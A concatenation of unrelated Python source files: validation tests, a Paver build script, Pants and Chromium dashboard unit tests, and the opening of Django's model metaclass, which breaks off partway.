schema = {'length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 'abc')
self.assertEqual('length of prop: abc must be equal to "4".',
str(error))
error = self.assertRaises(exception.ValidationError,
constraint.validate,
'abcde')
self.assertEqual('length of prop: abcde must be equal to "4".',
str(error))
def test_invalid_min_length(self):
schema = {'min_length': 'four'}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.STRING,
schema)
self.assertEqual('min_length must be integer.', str(error))
def test_min_length_validate(self):
schema = {'min_length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
self.assertIsNone(constraint.validate('abcd'))
self.assertIsNone(constraint.validate('abcde'))
def test_min_length_validate_fail(self):
schema = {'min_length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 'abc')
self.assertEqual('length of prop: abc must be at least "4".',
str(error))
def test_invalid_max_length(self):
schema = {'max_length': 'four'}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.STRING,
schema)
self.assertEqual('max_length must be integer.', str(error))
def test_max_length_validate(self):
schema = {'max_length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
self.assertIsNone(constraint.validate('abcd'))
self.assertIsNone(constraint.validate('abc'))
def test_max_length_validate_fail(self):
schema = {'max_length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate,
'abcde')
self.assertEqual('length of prop: abcde must be no greater than "4".',
str(error))
def test_pattern_validate(self):
schema = {'pattern': '[0-9]*'}
constraint = Constraint('prop', Schema.STRING, schema)
self.assertIsNone(constraint.validate('123'))
def test_pattern_validate_fail(self):
schema = {'pattern': '[0-9]*'}
constraint = Constraint('prop', Schema.STRING, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 'abc')
self.assertEqual('prop: "abc" does not match pattern "[0-9]*".',
str(error))
|
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
import time
import subprocess
# Import parameters from the setup file.
sys.path.append('.')
from setup import (
setup_dict, get_project_files, print_success_message,
print_failure_message, _lint, _test, _test_all,
CODE_DIRECTORY, DOCS_DIRECTORY, TESTS_DIRECTORY, PYTEST_FLAGS)
from paver.easy import options, task, needs, consume_args
from paver.setuputils import install_distutils_tasks
options(setup=setup_dict)
install_distutils_tasks()
# Miscellaneous helper functions
def print_passed():
# generated on http://patorjk.com/software/taag/#p=display&f=Small&t=PASSED
print_success_message(r''' ___ _ ___ ___ ___ ___
| _ \/_\ / __/ __| __| \
| _/ _ \\__ \__ \ _|| |) |
|_|/_/ \_\___/___/___|___/
''')
def print_failed():
# generated on http://patorjk.com/software/taag/#p=display&f=Small&t=FAILED
print_failure_message(r''' ___ _ ___ _ ___ ___
| __/_\ |_ _| | | __| \
| _/ _ \ | || |__| _|| |) |
|_/_/ \_\___|____|___|___/
''')
class cwd(object):
"""Class used for temporarily changing directories. Can be though of
as a `pushd /my/dir' then a `popd' at the end.
"""
def __init__(self, newcwd):
""":param newcwd: directory to make the cwd
:type newcwd: :class:`str`
"""
self.newcwd = newcwd
def __enter__(self):
self.oldcwd = os.getcwd()
os.chdir(self.newcwd)
return os.getcwd()
def __exit__(self, type_, value, traceback):
# This acts like a `finally' clause: it will always be executed.
os.chdir(self.oldcwd)
# Task-related functions
def _doc_make(*make_args):
"""Run make in sphinx' docs directory.
:return: exit code
"""
if sys.platform == 'win32':
# Windows
make_cmd = ['make.bat']
else:
# Linux, Mac OS X, and others
make_cmd = ['make']
make_cmd.extend(make_args)
# Account for a stupid Python "bug" on Windows:
# <http://bugs.python.org/issue15533>
with cwd(DOCS_DIRECTORY):
retcode = subprocess.call(make_cmd)
return retcode
# Tasks
@task
@needs('doc_html', 'setuptools.command.sdist')
def sdist():
"""Build the HTML docs and the tarball."""
pass
@task
def test():
"""Run the unit tests."""
raise SystemExit(_test())
@task
def lint():
# This refuses to format properly when running `paver help' unless
# this ugliness is used.
('Perform PEP8 style check, run PyFlakes, and run McCabe complexity '
'metrics on the code.')
raise SystemExit(_lint())
@task
def test_all():
"""Perform a style check and run all unit tests."""
retcode = _test_all()
if retcode == 0:
print_passed()
else:
print_failed()
raise SystemExit(retcode)
@task
@consume_args
def run(args):
"""Run the package's main script. All arguments are passed to it."""
# The main script expects to get the called executable's name as
# argv[0]. However, paver doesn't provide that in args. Even if it did (or
# we dove into sys.argv), it wouldn't be useful because it would be paver's
# executable. So we just pass the package name in as the executable name,
# since it's close enough. This should never be seen by an end user
# installing through Setuptools anyway.
from corbel.main import main
raise SystemExit(main([CODE_DIRECTORY] + args))
@task
def commit():
"""Commit only if all the tests pass."""
if _test_all() == 0:
subprocess.check_call(['git', 'commit'])
else:
print_failure_message('\nTests failed, not committing.')
@task
def coverage():
"""Run tests and show test coverage report."""
try:
import pytest_cov # NOQA
except ImportError:
print_failure_message(
'Install the pytest coverage plugin to use this task, '
"i.e., `pip install pytest-cov'.")
raise SystemExit(1)
import pytest
pytest.main(PYTEST_FLAGS + [
'--cov', CODE_DIRECTORY,
'--cov-report', 'term-missing',
TESTS_DIRECTORY])
@task # NOQA
def doc_watch():
"""Watch for changes in the docs and rebuild HTML docs when changed."""
try:
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
except ImportError:
print_failure_message('Install the watchdog package to use this task, '
"i.e., `pip install watchdog'.")
raise SystemExit(1)
class RebuildDocsEventHandler(FileSystemEventHandler):
def __init__(self, base_paths):
self.base_paths = base_paths
def dispatch(self, event):
"""Dispatches events to the appropriate methods.
:param event: The event object representing the file system event.
:type event: :class:`watchdog.events.FileSystemEvent`
"""
for base_path in self.base_paths:
if event.src_path.endswith(base_path):
super(RebuildDocsEventHandler, self).dispatch(event)
# We found one that matches. We're done.
return
def on_modified(self, event):
print_failure_message('Modification detected. Rebuilding docs.')
# # Strip off the path prefix.
# import os
# if event.src_path[len(os.getcwd()) + 1:].startswith(
# CODE_DIRECTORY):
# # sphinx-build doesn't always pick up changes on code files,
# # even though they are used to generate the documentation. As
# # a workaround, just clean before building.
doc_html()
print_success_message('Docs have been rebuilt.')
print_success_message(
'Watching for changes in project files, press Ctrl-C to cancel...')
handler = RebuildDocsEventHandler(get_project_files())
observer = Observer()
observer.schedule(handler, path='.', recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
@task
@needs('doc_html')
def doc_open():
"""Build the HTML docs and open them in a web browser."""
doc_index = os.path.join(DOCS_DIRECTORY, 'build', 'html', 'index.html')
if sys.platform == 'darwin':
# Mac OS X
subprocess.check_call(['open', doc_index])
elif sys.platform == 'win32':
# Windows
subprocess.check_call(['start', doc_index], shell=True)
elif sys.platform == 'linux2':
# All freedesktop-compatible desktops
subprocess.check_call(['xdg-open', doc_index])
else:
print_failure_message(
"Unsupported platform. Please open `{0}' manually.".format(
doc_index))
@task
def get_tasks():
"""Get all paver-defined tasks."""
from paver.tasks import environment
for task in environment.get_tasks():
print(task.shortname)
@task
def doc_html():
"""Build the HTML docs."""
retcode = _doc_make('html')
if retcode:
raise SystemExit(retcode)
@task
def doc_clean():
"""Clean (delete) the built docs."""
retcode = _doc_make('clean')
if retcode:
raise SystemExit(retcode)
|
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from textwrap import dedent
from pants.backend.codegen.targets.java_protobuf_library import JavaProtobufLibrary
from pants.backend.codegen.targets.java_thrift_library import JavaThriftLibrary
from pants.backend.codegen.targets.python_thrift_library import PythonThriftLibrary
from pants.backend.core.from_target import FromTarget
from pants.backend.core.targets.resources import Resources
from pants.backend.core.tasks.what_changed import WhatChanged
from pants.backend.core.wrapped_globs import Globs, RGlobs
from pants.backend.jvm.targets.jar_dependency import JarDependency
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.scala_jar_dependency import ScalaJarDependency
from pants.backend.jvm.targets.unpacked_jars import UnpackedJars
from pants.backend.python.targets.python_library import PythonLibrary
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.goal.workspace import Workspace
from pants_test.tasks.task_test_base import ConsoleTaskTestBase
class BaseWhatChangedTest(ConsoleTaskTestBase):
@property
def alias_groups(self):
return BuildFileAliases(
targets={
'java_library': JavaLibrary,
'python_library': PythonLibrary,
'jar_library': JarLibrary,
'unpacked_jars': UnpackedJars,
'resources': Resources,
'java_thrift_library': JavaThriftLibrary,
'java_protobuf_library': JavaProtobufLibrary,
'python_thrift_library': PythonThriftLibrary,
},
context_aware_object_factories={
'globs': Globs.factory,
'rglobs': RGlobs.factory,
'from_target': FromTarget,
},
objects={
'jar': JarDependency,
'scala_jar': ScalaJarDependency,
}
)
@classmethod
def task_type(cls):
return WhatChanged
def assert_console_output(self, *output, **kwargs):
options = {'spec_excludes': [], 'exclude_target_regexp': []}
if 'options' in kwargs:
options.update(kwargs['options'])
kwargs['options'] = options
super(BaseWhatChangedTest, self).assert_console_output(*output, **kwargs)
def workspace(self, files=None, parent=None, diffspec=None, diff_files=None):
class MockWorkspace(Workspace):
def touched_files(_, p):
self.assertEqual(parent or 'HEAD', p)
return files or []
def changes_in(_, ds):
self.assertEqual(diffspec, ds)
return diff_files or []
return MockWorkspace()
class WhatChangedTestBasic(BaseWhatChangedTest):
def test_nochanges(self):
self.assert_console_output(workspace=self.workspace())
def test_parent(self):
self.assert_console_output(options={'changes_since': '42'},
workspace=self.workspace(parent='42'))
def test_files(self):
self.assert_console_output(
'a/b/c',
'd',
'e/f',
options={'files': True},
workspace=self.workspace(files=['a/b/c', 'd', 'e/f'])
)
class WhatChangedTest(BaseWhatChangedTest):
def setUp(self):
super(WhatChangedTest, self).setUp()
self.add_to_build_file('root/src/py/a', dedent("""
python_library(
name='alpha',
sources=['b/c', 'd'],
resources=['test.resources']
)
jar_library(
name='beta',
jars=[
jar(org='gamma', name='ray', rev='1.137.bruce_banner')
]
)
"""))
self.add_to_build_file('root/src/py/1', dedent("""
python_library(
name='numeric',
sources=['2']
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/a', dedent("""
python_library(
name='a',
sources=['a.py'],
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/b', dedent("""
python_library(
name='b',
sources=['b.py'],
dependencies=['root/src/py/dependency_tree/a']
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/c', dedent("""
python_library(
name='c',
sources=['c.py'],
dependencies=['root/src/py/dependency_tree/b']
)
"""))
self.add_to_build_file('root/src/thrift', dedent("""
java_thrift_library(
name='thrift',
sources=['a.thrift']
)
python_thrift_library(
name='py-thrift',
sources=['a.thrift']
)
"""))
self.add_to_build_file('root/src/resources/a', dedent("""
resources(
name='a_resources',
sources=['a.resources']
)
"""))
self.add_to_build_file('root/src/java/a', dedent("""
java_library(
name='a_java',
sources=rglobs("*.java"),
)
"""))
self.add_to_build_file('root/3rdparty/BUILD.twitter', dedent("""
jar_library(
name='dummy',
jars=[
jar(org='foo', name='ray', rev='1.45')
])
"""))
self.add_to_build_file('root/3rdparty/BUILD', dedent("""
jar_library(
name='dummy1',
jars=[
jar(org='foo1', name='ray', rev='1.45')
])
"""))
# This is a directory that might confuse case insensitive file systems (on macs for example).
# It should not be treated as a BUILD file.
self.create_dir('root/scripts/a/build')
self.add_to_build_file('root/scripts/BUILD', dedent("""
java_library(
name='scripts',
sources=['a/build/scripts.java'],
)
"""))
self.add_to_build_file('BUILD.config', dedent("""
resources(
name='pants-config',
sources = globs('pants.ini*')
)
"""))
def test_spec_excludes(self):
self.assert_console_output(
'root/src/py/a:alpha',
options={'spec_excludes': 'root/src/py/1'},
workspace=self.workspace(files=['root/src/py/a/b/c', 'root/src/py/a/d'])
)
def test_owned(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
workspace=self.workspace(files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'])
)
def test_multiply_owned(self):
self.assert_console_output(
'root/src/thrift:thrift',
'root/src/thrift:py-thrift',
workspace=self.workspace(files=['root/src/thrift/a.thrift'])
)
def test_build(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/a:beta',
workspace=self.workspace(files=['root/src/py/a/BUILD'])
)
def test_resource_changed(self):
self.assert_console_output(
'root/src/py/a:alpha',
workspace=self.workspace(files=['root/src/py/a/test.resources'])
)
def test_resource_changed_for_java_lib(self):
self.assert_console_output(
'root/src/resources/a:a_resources',
workspace=self.workspace(files=['root/src/resources/a/a.resources'])
)
def test_build_sibling(self):
self.assert_console_output(
'root/3rdparty:dummy',
workspace=self.workspace(files=['root/3rdparty/BUILD.twitter'])
)
def test_resource_type_error(self):
self.add_to_build_file('root/src/resources/a1', dedent("""
java_library(
name='a1',
sources=['a1.test'],
resources=[1]
)
"""))
self.assert_console_raises(
Exception,
workspace=self.workspace(files=['root/src/resources/a1/a1.test'])
)
def test_build_directory(self):
# This should ensure that a directory named the same as build files does not cause an exception.
self.assert_console_output(
'root/scripts:scripts',
workspace=self.workspace(files=['root/scripts/a/build', 'root/scripts/a/build/scripts.java'])
)
def test_fast(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
options={'fast': True},
workspace=self.workspace(
files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'],
),
)
def test_diffspec(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
options={'diffspec': '42'},
workspace=self.workspace(
diffspec='42',
diff_files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'],
),
)
def test_diffspec_removed_files(self):
self.assert_console_output(
'root/src/java/a:a_java',
options={'diffspec': '42'},
workspace=self.workspace(
diffspec='42',
diff_files=['root/src/java/a/b/c/Foo.java'],
),
)
def test_include_dependees(self):
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
options={'include_dependees': 'direct'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
def test_exclude(self):
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive', 'exclude_target_regexp': [':b']},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
def test_deferred_sources(self):
self.add_to_build_file('root/proto', dedent("""
java_protobuf_library(name='unpacked_jars',
sources=from_target(':external-source'),
)
unpacked_jars(name='external-source',
libraries=[':external-source-jars'],
include_patterns=[
'com/squareup/testing/**/*.proto',
],
)
jar_library(name='external-source-jars',
jars=[
jar(org='com.squareup.testing.protolib', name='protolib-external-test', rev='0.0.2'),
],
)
"""))
self.assert_console_output(
'root/proto:unpacked_jars',
'root/proto:external-source',
'root/proto:external-source-jars',
workspace=self.workspace(files=['root/proto/BUILD'])
)
def test_root_config(self):
self.assert_console_output(
':pants-config',
workspace=self.workspace(files=['pants.ini'])
)
|
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import mock
import webapp2
import webtest
from dashboard import debug_alert
from dashboard import testing_common
from dashboard import utils
from dashboard.models import anomaly
from dashboard.models import anomaly_config
from dashboard.models import graph_data
_SAMPLE_SERIES = [
(300, 60.06), (301, 60.36), (302, 61.76), (303, 60.06), (304, 61.24),
(305, 60.65), (306, 55.61), (307, 61.88), (308, 61.51), (309, 59.58),
(310, 71.79), (311, 71.97), (312, 71.63), (313, 67.16), (314, 70.91),
(315, 73.40), (316, 71.00), (317, 69.45), (318, 67.16), (319, 66.05),
]
class DebugAlertTest(testing_common.TestCase):
def setUp(self):
super(DebugAlertTest, self).setUp()
app = webapp2.WSGIApplication(
[('/debug_alert', debug_alert.DebugAlertHandler)])
self.testapp = webtest.TestApp(app)
self.PatchDatastoreHooksRequest()
def _AddSampleData(self):
"""Adds a Test and Row entities, and returns the Test key."""
testing_common.AddTests(['M'], ['b'], {'suite': {'foo': {}}})
test_path = 'M/b/suite/foo'
rows_dict = {x: {'value': y} for x, y in _SAMPLE_SERIES}
testing_common.AddRows(test_path, rows_dict)
return utils.TestKey(test_path)
def testGet_WithInvalidTestPath_ShowsFormAndError(self):
response = self.testapp.get('/debug_alert?test_path=foo')
self.assertIn('<form', response.body)
self.assertIn('class="error"', response.body)
def testGet_WithValidTestPath_ShowsChart(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get('/debug_alert?test_path=%s' % test_path)
self.assertIn('id="plot"', response.body)
def testPost_SameAsGet(self):
# Post is the same as get for this endpoint.
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
get_response = self.testapp.get('/debug_alert?test_path=%s' % test_path)
post_response = self.testapp.post('/debug_alert?test_path=%s' % test_path)
self.assertEqual(get_response.body, post_response.body)
def testGet_WithNoParameters_ShowsForm(self):
response = self.testapp.get('/debug_alert')
self.assertIn('<form', response.body)
self.assertNotIn('id="plot"', response.body)
def testGet_WithRevParameter_EmbedsCorrectRevisions(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get(
'/debug_alert?test_path=%s&rev=%s&num_before=%s&num_after=%s' %
(test_path, 305, 10, 5))
self.assertEqual(
[300, 301, 302, 303, 304, 305, 306, 307, 308, 309],
self.GetEmbeddedVariable(response, 'LOOKUP'))
def testGet_InvalidNumBeforeParameter_ShowsFormAndError(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get(
'/debug_alert?test_path=%s&rev=%s&num_before=%s&num_after=%s' %
(test_path, 305, 'foo', 5))
self.assertIn('<form', response.body)
self.assertIn('class="error"', response.body)
self.assertNotIn('LOOKUP', response.body)
def _AddAnomalyConfig(self, config_name, test_key, config_dict):
"""Adds a custom anomaly config which applies to one test."""
anomaly_config_key = anomaly_config.AnomalyConfig(
id=config_name,
config=config_dict,
patterns=[utils.TestPath(test_key)]).put()
return anomaly_config_key
@mock.patch.object(debug_alert, 'SimulateAlertProcessing')
def testGet_TestHasOverriddenConfig_ConfigUsed(self, simulate_mock):
test_key = self._AddSampleData()
# Add a config which applies to the test. The test is updated upon put.
self._AddAnomalyConfig('X', test_key, {'min_absolute_change': 10})
test_key.get().put()
response = self.testapp.get(
'/debug_alert?test_path=%s' % utils.TestPath(test_key))
# The custom config should be used when simulating alert processing.
simulate_mock.assert_called_once_with(mock.ANY, min_absolute_change=10)
# The config JSON should also be put into the form on the page.
self.assertIn('"min_absolute_change": 10', response.body)
@mock.patch.object(debug_alert, 'SimulateAlertProcessing')
def testGet_WithValidCustomConfig_ConfigUsed(self, simulate_mock):
test_key = self._AddSampleData()
response = self.testapp.get(
'/debug_alert?test_path=%s&config=%s' %
(utils.TestPath(test_key),
'{"min_relative_change":0.75}'))
# The custom config should be used when simulating alert processing.
simulate_mock.assert_called_once_with(mock.ANY, min_relative_change=0.75)
# The config JSON should also be put into the form on the page.
self.assertIn('"min_relative_change": 0.75', response.body)
@mock.patch.object(debug_alert, 'SimulateAlertProcessing')
def testGet_WithBogusParameterNames_ParameterIgnored(self, simulate_mock):
test_key = self._AddSampleData()
response = self.testapp.get(
'/debug_alert?test_path=%s&config=%s' %
(utils.TestPath(test_key), '{"foo":0.75}'))
simulate_mock.assert_called_once_with(mock.ANY)
self.assertNotIn('"foo"', response.body)
def testGet_WithInvalidCustomConfig_ErrorShown(self):
test_key = self._AddSampleData()
response = self.testapp.get(
'/debug_alert?test_path=%s&config=%s' %
(utils.TestPath(test_key), 'not valid json'))
# The error message should be on the page; JS constants should not be.
self.assertIn('Invalid JSON', response.body)
self.assertNotIn('LOOKUP', response.body)
def testGet_WithStoredAnomalies_ShowsStoredAnomalies(self):
test_key = self._AddSampleData()
anomaly.Anomaly(
test=test_key, start_revision=309, end_revision=310,
median_before_anomaly=60, median_after_anomaly=70,
bug_id=12345).put()
response = self.testapp.get(
'/debug_alert?test_path=%s' % utils.TestPath(test_key))
# Information about the stored anomaly should be somewhere on the page.
self.assertIn('12345', response.body)
def testFetchLatestRows(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchLatestRows(test_key.get(), 4)
revisions = [r.revision for r in rows]
self.assertEqual([316, 317, 318, 319], revisions)
def testFetchAroundRev(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key.get(), 310, 5, 8)
revisions = [r.revision for r in rows]
self.assertEqual(
[305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317],
revisions)
def testFetchRowsAroundRev_NotAllRowsAvailable(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key.get(), 310, 100, 100)
# There are only 20 rows in the sample data, so only 20 can be fetched.
self.assertEqual(20, len(rows))
def testChartSeries(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key.get(), 310, 5, 5)
# The indexes used in the chart series should match those in the lookup.
self.assertEqual(
[(0, 60.65), (1, 55.61), (2, 61.88), (3, 61.51), (4, 59.58),
(5, 71.79), (6, 71.97), (7, 71.63), (8, 67.16), (9, 70.91)],
debug_alert._ChartSeries(rows))
def testRevisionList(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key.get(), 310, 5, 5)
# The lookup dict maps indexes to x-values in the input series.
self.assertEqual(
[305, 306, 307, 308, 309, 310, 311, 312, 313, 314],
debug_alert._RevisionList(rows))
def testCsvUrl_RowsGiven_AllParamsSpecified(self):
self._AddSampleData()
rows = graph_data.Row.query().fetch(limit=20)
self.assertEqual(
'/graph_csv?test_path=M%2Fb%2Fsuite%2Ffoo&num_points=20&rev=319',
debug_alert._CsvUrl('M/b/suite/foo', rows))
def testCsvUrl_NoRows_OnlyTestPathSpecified(self):
# If there are no rows available for some reason, a CSV download
# URL can still be constructed, but without specific revisions.
self.assertEqual(
'/graph_csv?test_path=M%2Fb%2Fsuite%2Ffoo',
debug_alert._CsvUrl('M/b/suite/foo', []))
def testGraphUrl_RevisionGiven_RevisionParamInUrl(self):
test_key = self._AddSampleData()
# Both string and int can be accepted for revision.
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo&rev=310',
debug_alert._GraphUrl(test_key.get(), 310))
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo&rev=310',
debug_alert._GraphUrl(test_key.get(), '310'))
def testGraphUrl_NoRevisionGiven_NoRevisionParamInUrl(self):
test_key = self._AddSampleData()
# Both None and empty string mean "no revision".
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo',
debug_alert._GraphUrl(test_key.get(), ''))
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo',
debug_alert._GraphUrl(test_key.get(), None))
if __name__ == '__main__':
unittest.main()
|
|
import types
import sys
from itertools import izip
import django.db.models.manager # Imported to register signal handler.
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned, FieldError, ValidationError, NON_FIELD_ERRORS
from django.core import validators
from django.db.models.fields import AutoField, FieldDoesNotExist
from django.db.models.fields.related import (OneToOneRel, ManyToOneRel,
OneToOneField, add_lazy_relation)
from django.db.models.query import Q
from django.db.models.query_utils import DeferredAttribute
from django.db.models.deletion import Collector
from django.db.models.options import Options
from django.db import (connections, router, transaction, DatabaseError,
DEFAULT_DB_ALIAS)
from django.db.models import signals
from django.db.models.loading import register_models, get_model
from django.utils.translation import ugettext_lazy as _
import django.utils.copycompat as copy
from django.utils.functional import curry, update_wrapper
from django.utils.encoding import smart_str, force_unicode
from django.utils.text import get_text_list, capfirst
from django.conf import settings
class ModelBase(type):
"""
Metaclass for all models.
"""
def __new__(cls, name, bases, attrs):
super_new = super(ModelBase, cls).__new__
parents = [b for b in bases if isinstance(b, ModelBase)]
if not parents:
# If this isn't a subclass of Model, don't do anything special.
return super_new(cls, name, bases, attrs)
# Create the class.
module = attrs.pop('__module__')
new_class = super_new(cls, name, bases, {'__module__': module})
attr_meta = attrs.pop('Meta', None)
abstract = getattr(attr_meta, 'abstract', False)
if not attr_meta:
meta = getattr(new_class, 'Meta', None)
else:
meta = attr_meta
base_meta = getattr(new_class, '_meta', None)
if getattr(meta, 'app_label', None) is None:
# Figure out the app_label by looking one level up.
# For 'django.contrib.sites.models', this would be 'sites'.
model_module = sys.modules[new_class.__module__]
try:
kwargs = {"app_label": model_module.__name__.split('.')[-2]}
except IndexError:
kwargs = {"app_label": 'Model'}
else:
kwargs = {}
new_class.add_to_class('_meta', Options(meta, **kwargs))
if not abstract:
new_class.add_to_class('DoesNotExist', subclass_exception('DoesNotExist',
tuple(x.DoesNotExist
for x in parents if hasattr(x, '_meta') and not x._meta.abstract)
or (ObjectDoesNotExist,), module))
new_class.add_to_class('MultipleObjectsReturned', subclass_exception('MultipleObjectsReturned',
tuple(x.MultipleObjectsReturned
for x in parents if hasattr(x, '_meta') and not x._meta.abstract)
or (MultipleObjectsReturned,), module))
if base_meta and not base_meta.abstract:
# Non-abstract child classes inherit some attributes from their
# non-abstract parent (unless an ABC comes before it in the
# method resolution order).
if not hasattr(meta, 'ordering'):
new_class._meta.ordering = base_meta.ordering
if not hasattr(meta, 'get_latest_by'):
new_class._meta.get_latest_by = base_meta.get_latest_by
is_proxy = new_class._meta.proxy
if getattr(new_class, '_default_manager', None):
if not is_proxy:
# Multi-table inheritance doesn't inherit default manager from
# parents.
new_class._default_manager = None
new_class._base_manager = None
else:
# Proxy classes do inherit parent's default manager, if none is
# set explicitly.
new_class._default_manager = new_class._default_manager._copy_to_model(new_class)
new_class._base_manager = new_class._base_manager._copy_to_model(new_class)
# Bail out early if we have already created this class.
m = get_model(new_class._meta.app_label, name, False)
if m is not None:
return m
# Add all attributes to the class.
for obj_name, obj in attrs.items():
new_class.add_to_class(obj_name, obj)
# All the fields of any type declared on this model
new_fields = new_class._meta.local_fields + \
new_class._meta.local_many_to_many + \
new_class._meta.virtual_fields
field_names = set([f.name for f in new_fields])
# Basic setup for proxy models.
if is_proxy:
base = None
for parent in [cls for cls in parents if hasattr(cls, '_meta')]:
if parent._meta.abstract:
if parent._meta.fields:
raise TypeError("Abstract base class containing model fields not permitted for proxy model '%s'." % name)
else:
continue
if base is not None:
raise TypeError("Proxy model '%s' has more than one non-abstract model base class." % name)
else:
base = parent
if base is None:
raise TypeError("Proxy model '%s' has no non-abstract model base class." % name)
if (new_class._meta.local_fields or
new_class._meta.local_many_to_many):
raise FieldError("Proxy model '%s' contains model fields." % name)
while base._meta.proxy:
base = base._meta.proxy_for_model
new_class._meta.setup_proxy(base)
# Do the appropriate setup for any model parents.
o2o_map = dict([(f.rel.to, f) for f in new_class._meta.local_fields
if isinstance(f, OneToOneField)])
for base in parents:
original_base = base
if not hasattr(base, '_meta'):
# Things without _meta aren't functional models, so they're
# uninteresting parents.
continue
parent_fields = base._meta.local_fields + base._meta.local_many_to_many
# Check for clashes between locally declared fields and those
# on the base classes (we cannot handle shadowed fields at the
# moment).
for field in parent_fields:
if field.name in field_names:
raise FieldError('Local field %r in class %r clashes '
'with field of similar name from '
'base class %r' %
(field.name, name, base.__name__))
if not base._meta.abstract:
# Concrete classes...
while base._meta.proxy:
# Skip over a proxy class to the "real" base it proxies.
base = base._meta.proxy_for_model
if base in o2o_map:
field = o2o_map[base]
elif not is_proxy:
attr_name = '%s_ptr' % base._meta.module_name
field = OneToOneField(base, name=attr_name,
auto_created=True, parent_link=True)
new_class.add_to_class(attr_name, field)
else:
field = None
new_class._meta.parents[base] = field
else:
# .. and abstract ones.
for field in parent_fields:
new_class.add_to_class(field.name, copy.deepcopy(field))
# Pass any non-abstract parent classes onto child.
new_class._meta.parents.update(base._meta.parents)
# Inherit managers from the abstract base classes.
new_class.copy_managers(base._meta.abstract_managers)
# Proxy models inherit the non-abstract managers from their base,
# unless they have redefined any of them.
if is_proxy:
new_class.copy_managers(original_base._meta.concrete_managers)
# Inherit virtual fields (like GenericForeignKey) from the parent
# class
for field in base._meta.virtual_fields:
if base._meta.abstract and field.name in field_names:
raise FieldError('Local field %r in class %r clashes '\
'with field of similar name from '\
'abstract base class %r' % \
(field.name, name, base.__name__))
new_class.add_to_class(field.name, copy.deepcopy(field))
if abstract:
# Abstract base models can't be instantiated and don't appear in
# the list of models for an app. We do the final setup for them a
# little differently from normal models.
attr_meta.abstract = False
new_class.Meta = attr_meta
return new_class
new_class._prepare()
register_models(new_class._meta.app_label, new_class)
# Because of the way imports happen (recursively), we may or may not be
# the first time this model tries to register with the framework. There
# should only be one class for each model, so we always return the
# registered version.
return get_model(new_class._meta.app_label, name, False)
def copy_managers(cls, base_managers):
# This is in-place sorting of an Options attribute, but that's fine.
base_managers.sort()
for _, mgr_name, manager in base_managers:
val = getattr(cls, mgr_name, None)
if not val or val is manager:
new_manager = manager._copy_to_model(cls)
cls.add_to_class(mgr_name, new_manager)
def add_to_class(cls, name, value):
if hasattr(value, 'contribute_to_class'):
value.contribute_to_class(cls, name)
else:
setattr(cls, name, value)
def _prepare(cls):
"""
